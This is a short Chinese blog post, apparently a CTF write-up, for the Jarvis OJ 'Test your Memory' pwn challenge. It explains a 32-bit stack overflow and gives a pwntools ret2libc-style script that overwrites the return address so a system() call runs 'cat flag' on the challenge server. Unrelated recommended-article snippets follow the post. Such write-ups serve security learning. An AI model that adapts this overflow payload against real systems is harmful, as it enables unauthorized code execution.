Jarvis OJ---Test your Memory

32位下的简单栈溢出,IDA反编译之后发现在memtest函数之中传入参数cat flag,在函数winfunc之中调用了系统函数system。

image.png
image.png

ret2libc,直接getshell

from pwn import *

p = remote("pwn2.jarvisoj.com",9876)
callsystem = 0x080485BD
catflag = 0x080487E0
payload = 'a'*(0x13 + 4) + p32(callsystem) + p32(0x08048677) + p32(catflag)
p.sendline(payload)
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • *面试心声:其实这些题本人都没怎么背,但是在上海 两周半 面了大约10家 收到差不多3个offer,总结起来就是把...
    Dove_iOS阅读 27,241评论 30 472
  • 1:InputChannel提供函数创建底层的Pipe对象 2: 1)客户端需要新建窗口 2)new ViewRo...
    自由人是工程师阅读 5,444评论 0 18
  • 有个说法我一直觉得挺有意思,叫做“像放电影一样”把发生过的事情回忆一下,“过一遍”。还有句话,叫做“吾日三省吾身”...
    titi是我阅读 594评论 2 51
  • 这,有缘有故 上天的眷恋,也许 让我好在这茫茫的人生 没有早一步 也没晚一步 遇见你 从此我的心房多了一坛酒 女儿...
    林三同學阅读 157评论 0 0
  • 暗影工作室专属图标希望大家多多关注暗影工作室,了解暗影工作室! 暗影工作室介绍 Minecra...
    Minecraft小酷阅读 3,654评论 2 2